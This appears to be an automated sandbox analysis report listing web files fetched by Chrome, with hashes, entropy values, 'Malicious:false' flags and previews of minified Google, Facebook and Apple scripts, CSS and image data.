                                                                                                                                                                                                                                SHA-256:F6D2937810B8359D76170A09D32362B78D80BC67409AC101D60889D6003141F6
                                                                                                                                                                                                                                SHA-512:BCAE98EE2617C68F2A2CCCE575EDB92B0431D1ED8E11B275DF346442560F384E96D705E61060C07EAECDF1AB88CF8F36B2E2B93D1C4CA572073F10181FECACC9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,EEDORb,EFQ78c,GkRiKb,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,PrPYRd,QIhFr,RMhBfe,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,gychg,hKSk3e,hc6Ubd,kWgXee,kjKdXe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,n73qwf,ovKuLd,pYCIec,pjICDe,pw70Gc,q0NEmc,s39S4,vrGZEc,w9hDv,wW2D8b,ws9Tlc,xQtZb,xUdipf,yDVVkb,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=soHxf,IJGqxf,wg1P6b,ywOR5c,PHUIyb,BfdUQc,oEJvKc,kJXwXb,chfSwc,pCKBF,HnDLGf,RQJprf,gKWqec,tKHFxf,M2Qezd,rpbmN"
                                                                                                                                                                                                                                Preview:"use strict";_F_installCss(".hUTled{height:50px;left:50%;margin-left:-25px;margin-top:-25px;position:fixed;text-align:center;top:50%;width:50px;z-index:20001}.k7smx{background-color:#fff;bottom:0;left:0;opacity:.5;position:fixed;right:0;top:0;z-index:20000}.rFrNMe{-webkit-user-select:none;-webkit-user-select:none;-webkit-tap-highlight-color:transparent;display:inline-block;outline:none;padding-bottom:8px;width:200px}.aCsJod{height:40px;position:relative;vertical-align:top}.aXBtI{display:flex;position:relative;top:14px}.Xb9hP{display:flex;box-flex:1;flex-grow:1;flex-shrink:1;min-width:0%;position:relative}.A37UZe{box-sizing:border-box;height:24px;line-height:24px;position:relative}.qgcB3c:not(:empty){padding-right:12px}.sxyYjd:not(:empty){padding-left:12px}.whsOnd{box-flex:1;flex-grow:1;flex-shrink:1;background-color:transparent;border:none;display:block;font:400 16px Roboto,RobotoDraft,Helvetica,Arial,sans-serif;height:24px;line-height:24px;margin:0;min-width:0%;outline:none;padding:0;
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):4286
                                                                                                                                                                                                                                Entropy (8bit):4.933290584110762
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:5+8ItBBBuxc+6QQQQQiRRRRRRRRRRJJO9P111118B:1cjRRRRRRRRRRi90
                                                                                                                                                                                                                                MD5:8CDDCA427DAE9B925E73432F8733E05A
                                                                                                                                                                                                                                SHA1:1999A6F624A25CFD938EEF6492D34FDC4F55DEDC
                                                                                                                                                                                                                                SHA-256:89676A3FB8639D6531C525E5800FF4CC44D06D27FF5607922D27E390EB5B6E62
                                                                                                                                                                                                                                SHA-512:20FBEE2886995C253E762F2BB814AD16890B0989DEAB4D92394363EF0060B96A634D87C380C7BA1B787A8AB312BE968FED9329A729B4E0D64235A09E397DB740
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico
                                                                                                                                                                                                                                Preview:...... .... .........(... ...@..... ......................................................................e.G.c.......................d...c...e.G.............................................................................j...f...f...f...e.......................f...f...f...g...f...j...........................................................m$..j...i...h...h...h...h.......................h...h...h...h...h...i...j...m$..............................................j...j...j...j...j...j...k...j.......................j...k...j...k...k...k...k...l...u.......................................q.-.n...m...l...m...l...l...m...l.......................l...m...l...m...m...m...m...m...n...q.-.............................u...p...o...o...o...o...o...o...o...o.......................o...p...o...p...p...o...p...o...o...p...u........................$..r...r...q...q...q...q...q...q...r...q.......................r...q...r...q...q...r...q...r...r...q...r....$..................v...t...t...t...t...t...t...t...t
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (7780)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):45002
                                                                                                                                                                                                                                Entropy (8bit):5.45952480481115
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:/+7HfJzz/IixGgUwVy8CZD4cTxW5lVPgrfwhRBB9Y6HrjIyKqe08Hfb:W7HfvUwVy864ZL+fwh4z/b
                                                                                                                                                                                                                                MD5:30D99FF9D0130FF15ECD46F9C4816BA6
                                                                                                                                                                                                                                SHA1:BD98D3047B1855D008E615077D155BFEE701BB9F
                                                                                                                                                                                                                                SHA-256:0C31EC8A54F2AF241561936BB614921C725876D403ECC78C40D2D4FEB7F2E605
                                                                                                                                                                                                                                SHA-512:E86CE3219C565CA83FB16235980ACDB10B2E6B94028E6BA2F41701368A27600C8ADF5BA7071251E30E1D52F5958D59504F2349DC5934CC7569CEB5A085B19222
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/wc_C9ZEewR3.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ActorURI",["ActorURIConfig","URI"],(function(a,b,c,d,e,f,g){var h;function a(a,b){return new(h||(h=c("URI")))(a).addQueryData(c("ActorURIConfig").PARAMETER_ACTOR,b)}g.create=a;g.PARAMETER_ACTOR=c("ActorURIConfig").PARAMETER_ACTOR}),98);.__d("BladeRunnerDeferredClient",["Promise","nullthrows","requireDeferred"],(function(a,b,c,d,e,f,g){var h;a=function(){function a(){this.$1=null}var d=a.prototype;d.requestStream=function(a,b,d,e){this.$2();return c("nullthrows")(this.$1).then(function(c){return c.requestStream(a,b,d,e)})};d.logInfo=function(a){this.$2();return c("nullthrows")(this.$1).then(function(b){b.logInfo(a)})};d.bumpCounter=function(a){this.$2();return c("nullthrows")(this.$1).then(function(b){b.bumpCounter(a)})};d.$2=function(){this.$1==null&&(this.$1=new(h||(h=b("Promise")))(function(a){c("requireDeferred")("BladeRunnerClient").__setRef("BladeRunnerDeferredClient").onReady(function(b){a(new b())})}))};return a}();d=new a();g["default"]=d}),98);.__d("Bla
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):11900
                                                                                                                                                                                                                                Entropy (8bit):7.979698894528496
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:4nitZWZDB4m2Rme8rwDV0Bn5+oov6ijiWJmCHxgNaj3AG5YeaRvmx6h2M:0IkdB4mQTDSRyiWJmCHxwGq/
                                                                                                                                                                                                                                MD5:5F95006BFED89D91C40C9F8EB0572EB3
                                                                                                                                                                                                                                SHA1:CB766FD85C02E2BE451D2A105DCC1BABB6F60E85
                                                                                                                                                                                                                                SHA-256:61AAE5B6BB1C1334CE83F1D6D20BFCF9ED04C2936ACA95EE46CA71148C5ABDB3
                                                                                                                                                                                                                                SHA-512:AED17F152F5899411369D1A82EA368F8BB8CAE881D1C8CD82A3D78B1B48AE70C5F53D1457A91530A4D17BF5F27AB344D33DAD2E70587150D5AA9F435173F17A2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://is1-ssl.mzstatic.com/image/thumb/PurpleSource211/v4/9b/1a/9f/9b1a9fad-186d-1acc-1511-c093c0e97bff/9812d4ae-38c2-45ce-8818-d523b841b5e0_3_iOS_6.7.jpg/230x0w.webp
                                                                                                                                                                                                                                Preview:RIFFt...WEBPVP8X..............VP8 .-.......*....>.N.I$"!..T.......-...g.O........?77.....P.r.....m.{.........7..~...{......m.......oL_e?A.._......|'.u...o.o.....G....{.s.....?.hO............{.G....Z...l....y......Q.......n......O..........G.w....?..g.....w........z..(......k...s.!.B..!...1.c..1.c..Z.:i..W.%5{c03I..Wk....6;.v...s.y.7'.CL......~X.!.).......r%7..........."...3{..W..c..E.}.MZ..,.Z....N....~o.'.ZT...B..!.Gw.1.[.1.r...2.G~.Ul..wBwp....piA...[-KS,1.@-#.2ikq..#....{.$..Q=...@p>^+.h.......fy.h.o..............%8........u.Ri..o..Q......Wn7..'...f.ya...J?.c.^<.|..?.u..b..!...D(A...a..*.2+KJ...D.[....,_..W._C.(s..`J.....`.d..by1.>...OR....uL;..&......Z9..^...3..>...qV4X..CF..*....a.gh"..!...K.e.V....%I.".*/R`&.6...e6...u!To..>B.U...7....(f.*..I......p.KR_.c.....0.;.h8.Kq!.\.{<S......FJ...q|....|..y..y.....,.(..W..A..y.xR...s.0$f..0..(Y._..Jm.G.m[,...S(.....+h...@m.....a..H..`vd.t..}.9w5C-.....5......*....jR.i.....k..oT......7]pg7..O%..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (3857)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1160544
                                                                                                                                                                                                                                Entropy (8bit):5.44525335877561
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:7IcMsN8pGT4l9C8OGMVi7Bv01hCAURju5p9NI:pUlT3v01Qg96
                                                                                                                                                                                                                                MD5:56D26A46D0406F26005B8F47282EE333
                                                                                                                                                                                                                                SHA1:69438EBE096B22A729813A305B578D0A58507384
                                                                                                                                                                                                                                SHA-256:B5D9652D1696ADD89336DCCC3A72768A9E09D64D1186A82F2F8C38AFE117E4EF
                                                                                                                                                                                                                                SHA-512:9BFA2CF2EDA8AE9BF95EDB16CB8E076CC18693AC25727871B3ECF1C6B22268C6745BB49A49BA66236CB9224BF6CC3DABE38229A703602A3CA62DEFE1552737F3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/*! See /acknowledgements.txt for open-source licenses */."use strict".define("web-experience-app/app",["exports","@ember/application","@ember/debug","@amp/web-apps-featurekit","web-experience-app/resolver","ember-load-initializers","web-experience-app/config/environment","web-experience-app/utils/config","web-experience-app/utils/consts"],(function(e,t,r,i,n,a,o,l,s){function p(e,t,r){var i.return(t="symbol"==typeof(i=function(e,t){if("object"!=typeof e||!e)return e.var r=e[Symbol.toPrimitive].if(void 0!==r){var i=r.call(e,t||"default").if("object"!=typeof i)return i.throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(t,"string"))?i:String(i))in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r,e}Object.defineProperty(e,"__esModule",{value:!0}),e.default=void 0,"undefined"==typeof global&&"undefined"!=typeof window&&(window.global=window).class c extends t.default{constructor(...e){super(...e)
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):1876
                                                                                                                                                                                                                                Entropy (8bit):7.843578031167886
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:TlqrfUmQnMSOlQeRWSXYLXsYKrsuuUNNgW/GfY1qq9:TlqQGS6BYSoLXsYKAB0gW/GaqG
                                                                                                                                                                                                                                MD5:83D5EF2DFF03919ADFD81050C4B8E546
                                                                                                                                                                                                                                SHA1:A82F473545582E27C46A3DAE1CB979704760AF12
                                                                                                                                                                                                                                SHA-256:BE92330AD3F3AC85632801AAC147EDE0AA9A1DCA7579CC68EB3812DF84507B62
                                                                                                                                                                                                                                SHA-512:E7296B09AB3B71866C006085A39756D8F27A59524A47E0996C3FA1EE381FDB23EDAB319531D01D78FBAA7E70ED0DB37EBDA46ED7C513F800023019DB4CBCBB6B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://is1-ssl.mzstatic.com/image/thumb/Purple221/v4/3a/91/07/3a9107db-4c42-a961-c373-e8b8b49e9682/AppIcon-0-0-1x_U007epad-0-1-0-85-220.png/146x0w.webp
                                                                                                                                                                                                                                Preview:RIFFL...WEBPVP8X..............VP8 ....P&...*....>.H.I#"!.i$.4...p..q...?......+...;....$......k_...X<.~.~...t..`..........e.a.M.c....8..o.....0..O.yc.N.s.. ...ZQ&w...`.....D.6..G....(.w(L...g..:..0E.b.U.G.F+~L....3..{.>&/.a,.~..L\ #._.L..2..kA......~..9'@D...O.gA.0".3.p....I}.U..[%.z..)X.+`h[bH'._......(.7..^.K..T...1...s.....KU..\(mi.......o..S...........v4.....).G..l.E.2...M. ....m..(v.;..NH.]}.n..!.Y..?....P.._...%....-.....=T...D...o#....9..vL...w...C..!;.%U..5:...8.Z...a^..-Lq...<B3..D.'..i.=..?/.E..4...H.!.+...(..../... ?....rz5k^.V...%....xWg.O..5.}..lcj.]U2.W>.3.~4...A.\...~.\.........Xm...XR)h........aM...k.;.....%tZ_.3...mN...}.^.H.8bP..6>jw...-.I.!.".....+a..._...N..t*6..*`.:.F....H...ij........]..._.......T.aw.9P.... )..%q{..)R..S........1...!..~.lG.nC..U.n....[.'.~/.G ._Z...,.D..b..........SP..m..T.I.C....=....x.....R..*7.).o#.=.Xm.@.~.Wj./m7.=%...v.Fbz.+.a..F.)g...h.]G...........L.X....h.C.....o1@.....f....4"`.U.=.y%..\.s..K.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 192 x 192, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2106
                                                                                                                                                                                                                                Entropy (8bit):7.554456957317547
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:EWP8JUaPVKWwCtcHB3sXXRBJ3v8qkZ/aWr/3KZerMLvSOxJ3Df8sfqV1:lkJVKWw03XXZ4Meo931fq
                                                                                                                                                                                                                                MD5:6452ED75C53E1A8E90A664DF18959A90
                                                                                                                                                                                                                                SHA1:AC01FC2F40F0E4808E22A9C569F3775F0F15A5E2
                                                                                                                                                                                                                                SHA-256:C7BAC3E7016DFC7EB5787579BAC6B975B433FC1A9C279DAFC35649D4782F2061
                                                                                                                                                                                                                                SHA-512:4B23F7FB31826943CBA6496BD74DC620C8EC3B8F0525497E825F1F1F87486335D4374F85417458C3C3E018C2215B9B419D7DE77CB67AAE9EA619038432E1EB10
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR.............e..5...YPLTEGpL.e..e..e..p..e..f..f..h..f..f..`..`.....g..f..f..g..g..f..f..f..g..f..h..e..f..d..g..e..e..c..f..f..e..f..g..g..e..f..f........i..h..e..f..f.....e........e..g..f..f..f..f..f..f..g........f..e..e.......F........................f....F.....d........'y.....p....E.....U..7..t.................6..t...........U.................................p......uy...LtRNS.0`..... ......p..._....@..@..oPP...O.^..__....0.o.o.oO..p.P.P_n. ..@0..P........DIDATx..YS.G..G.]..N...t.6&.$..8v|.>{.."....m.3...../...X...*./.....z..Z...^-."|GT(T.K..Z..n..z.3..BT..Z....\.)..Y.....)..\XZs%..e../...........:....Z.R...,X...B....VCL......".~)P...@..P..8......YG..<...=..BLs..CX........0..J...I....Z..,....0g...i...B..}6.Eh.$.g.D1.k......... ..WYD....O..b~.~......U..s4..?...d0........x.g7.zF...........9..G*.A...~...=#.w0.1Z......K..BV..>....x.p...<LS...ft..(|...2XDE.Q...yc..$Mu.@.L...R=.X,.H....!.X).j../.-q2.....09.........\...&.bYk........j.o......../.u}..(5!.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):366
                                                                                                                                                                                                                                Entropy (8bit):4.978776395938356
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:tI9mc4sl3UE7wRtG2VEWhGWLYayuRt+wyo6YmBQWLvQVHwB5JbHdGoQgQSx:t41MfYWcWjyuf+wyoNMQ/wB5Gg9
                                                                                                                                                                                                                                MD5:BC4F4BFDD931E007AB096DD1C209C689
                                                                                                                                                                                                                                SHA1:9D97DA68C8FE7482E604148596EF8A97792AC08A
                                                                                                                                                                                                                                SHA-256:03B3A7317370504145583EB221372D6C19C060F84F10CF391459E7441E95C381
                                                                                                                                                                                                                                SHA-512:371F30F422B303D4A45136181372C7E95D3EFCEFCCFB13B7D3640EDE79802C840437AE14D3154750095F69748D87F6520265F01025B32D8E39C3CAFE4EC6D8F2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/images/stars-lg-bc4f4bfdd931e007ab096dd1c209c689.svg
                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 13 28">. <path fill="#FF9500" d="M6.496.173L4.521 5.251H.007l3.738 2.751-1.481 5.149 4.232-3.386 4.232 3.386-1.482-5.149 3.739-2.751H8.471z"/>. <path fill="#BFBFBF" d="M6.5 14.35l-1.978 5.087H0l3.745 2.755-1.484 5.158L6.5 23.959l4.239 3.391-1.484-5.158L13 19.437H8.478z" transform="translate(0 -.15)" />.</svg>.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (60871)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):97946
                                                                                                                                                                                                                                Entropy (8bit):4.976414433545297
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:8mrgoskJlsmFUMsvRYoNgCWflnkO6snajeQO7:8mrBkW76ORJ
                                                                                                                                                                                                                                MD5:79ABB7A1082240DD4B465B9FF64989C5
                                                                                                                                                                                                                                SHA1:3F81542C95E0B17EE41217FF9C11C49A08BE9A53
                                                                                                                                                                                                                                SHA-256:B2ECAC9C8D644496B78DDA8D634E164BBA72F1C8B5B4F841B5B913DEEB399682
                                                                                                                                                                                                                                SHA-512:95C18CD0B04C2366FC195082E47B38D77FC9D73AA701EAF09EB04158510FB6C8F0E3C6E86AFAC876A582DD7AD570DF5B0EBB4E7FF327EF92F287CC4205C3A1B2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ProtonColors",["cssVar","color"],(function(a,b,c,d,e,f,g,h){"use strict";var i=!1;function j(a){try{return c("color")(a)}catch(a){return i?c("color")("#000000"):null}}a=function(a,b){a=j(a)||c("color")("#000000");return a.alpha(b).string()};b={white:"#ffffff",black:"#000000",neutral0:"#f9f9fa",neutral10:"#f3f3f6",neutral20:"#edeeef",neutral30:"#e6e8ea",neutral40:"#dee0e4",neutral50:"#d6d9dd",neutral60:"#cdd1d7",neutral70:"#c4c9d0",neutral80:"#bac0c9",neutral90:"#b0b7c2",neutral100:"#a5aebb",neutral110:"#99a4b4",neutral120:"#8d99ad",neutral130:"#808fa6",neutral140:"#72839e",neutral150:"#637797",neutral160:"#596c8c",neutral170:"#4f6182",neutral180:"#455778",neutral190:"#3c4c6d",neutral200:"#334162",neutral210:"#293657",neutral220:"#212b4a",neutral230:"#18203c",neutral240:"#0f142a",darkNeutral0:"#e2e4e8",darkNeutral10:"#d5d8df",darkNeutral20:"#c7cbd4",darkNeutral30:"#b7bcc8",darkNeutral40:"#a8adbc",darkNeutral50:"#9aa0b1",darkNeutral60:"#8c94a8",darkNeutral70:"#808
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):157537
                                                                                                                                                                                                                                Entropy (8bit):5.450896766346486
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:VcQ2UlYdxMXwcK2Bg6mqBhHPVy/ynVmXeXWH2H3i47UW4nb00pqpIReMaahQYg5U:f1mhfaahWIhsMkVT+BTtdOaBrdD
                                                                                                                                                                                                                                MD5:E8E8B7A18F4EBDA24A25F702B22FA5C1
                                                                                                                                                                                                                                SHA1:45DF73C1E3A0A3221A36654FCC46250E31D44C3C
                                                                                                                                                                                                                                SHA-256:B740DD04F5C2A05AC983F4716999989B7A05B48C7E4717F77729B3DF19E97E3C
                                                                                                                                                                                                                                SHA-512:57098BD96ADF38227E5B3C05CB1C715A9207F0BD4B198E3CF2B2A654D020BA3E0D65D04614F041E4291C86D928AB290619319C8C27F54D4563CBE71779568030
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://www.apple.com/api-www/global-elements/global-header/v1/assets/globalheader.umd.js
                                                                                                                                                                                                                                Preview:(function(mt){typeof define=="function"&&define.amd?define(mt):mt()})(function(){"use strict";function mt(e,t){return t.forEach(function(s){s&&typeof s!="string"&&!Array.isArray(s)&&Object.keys(s).forEach(function(n){if(n!=="default"&&!(n in e)){var a=Object.getOwnPropertyDescriptor(s,n);Object.defineProperty(e,n,a.get?a:{enumerable:!0,get:function(){return s[n]}})}})}),Object.freeze(Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}))}var Ye,M,ss,ns,Je,is,as,dt={},os=[],Pn=/acit|ex(?:s|g|n|p|$)|rph|grid|ows|mnc|ntw|ine[ch]|zoo|^ord|itera/i;function we(e,t){for(var s in t)e[s]=t[s];return e}function rs(e){var t=e.parentNode;t&&t.removeChild(e)}function Xe(e,t,s){var n,a,i,l={};for(i in t)i=="key"?n=t[i]:i=="ref"?a=t[i]:l[i]=t[i];if(arguments.length>2&&(l.children=arguments.length>3?Ye.call(arguments,2):s),typeof e=="function"&&e.defaultProps!=null)for(i in e.defaultProps)l[i]===void 0&&(l[i]=e.defaultProps[i]);return et(e,l,n,a,null)}function et(e,t,s,n,a){var i={type:e,props:
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2701)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3245
                                                                                                                                                                                                                                Entropy (8bit):5.348177629215205
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:upnlrpevhTuAG9T+ojsBSBY7p0aCW1//H/71LJBMLEvgj+CCMSmvygNscKApaWv+:upnlruLeTdjBBYtPdfrpijC8vyepaTd
                                                                                                                                                                                                                                MD5:706B93A70D825C3906B9080E0C5924E8
                                                                                                                                                                                                                                SHA1:BA10D0661DF8C6762D99871F7168C2C729841592
                                                                                                                                                                                                                                SHA-256:7C784877F18CDFF0C5F948BF11E89475E272EDB8A9130C5518B3EB71DDC74781
                                                                                                                                                                                                                                SHA-512:9AD813150AD90DA8CBAB1A70C56F35130BD3F49F5A3A3372BF7B37ECD9444EA367FA7EBC4E70030843D913CD74665B6DB4F33FA1A2288222344FD9230B684007
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{c as n,a as t}from"./p-2649b6ee.js";var o=n((function(n,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default="undefined"!=typeof FastBoot?FastBoot.require("buffer").Buffer:"undefined"!=typeof process&&null!==process.versions&&null!==process.versions.node?Buffer:window.Buffer})),e=n((function(n,t){Object.defineProperty(t,"__esModule",{value:!0}),t.memoize=void 0,t.memoize=function(n){return function(...t){let o="",e=t.length;for(n._memoi
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (52282)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):103009
                                                                                                                                                                                                                                Entropy (8bit):4.782008653752139
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:t1MCMPMCMjMCM4MCMwMCM3sVM3709gbQZMfjSFOlyPG9dXgRM0J:W709gUGGFwyPG9dwRM0J
                                                                                                                                                                                                                                MD5:C325BE79A5ECCA85D68EB9E5B65A547A
                                                                                                                                                                                                                                SHA1:F2A96686228994A46961657DF4C9405AFEC8E9C2
                                                                                                                                                                                                                                SHA-256:5CEAABA22D75B58E04150311F596306562A3E595E27ED4B1DFA451B82DDA9E50
                                                                                                                                                                                                                                SHA-512:4A71F958AF9B67180F1ECE38B96217F8B2C9009F7FD8F90F299E508808FA4DAF3AC3E7EC6F64E47267D1C955F7A419CC15C57BA103C9925F507AF4825ABDD6E8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css
                                                                                                                                                                                                                                Preview:/*!. * Font Awesome Free 6.5.2 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):2238
                                                                                                                                                                                                                                Entropy (8bit):7.850368095712798
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:EYTHncpBSKijTsM7q9vn/ENNPGDyPt1FFD8YqzFyfC9yo6hi+TTM:EYTHcvLM7gEmDyAY8Fyf2y/M
                                                                                                                                                                                                                                MD5:E650F1867FA1D536CE3E0979F17FEA60
                                                                                                                                                                                                                                SHA1:2E57A290B608C8D976CF10692A3B6F3FCE0E3EF1
                                                                                                                                                                                                                                SHA-256:371416913DBA9BB3E700C8315B4F54F296F807AB6178A2E3101CD148FA281F19
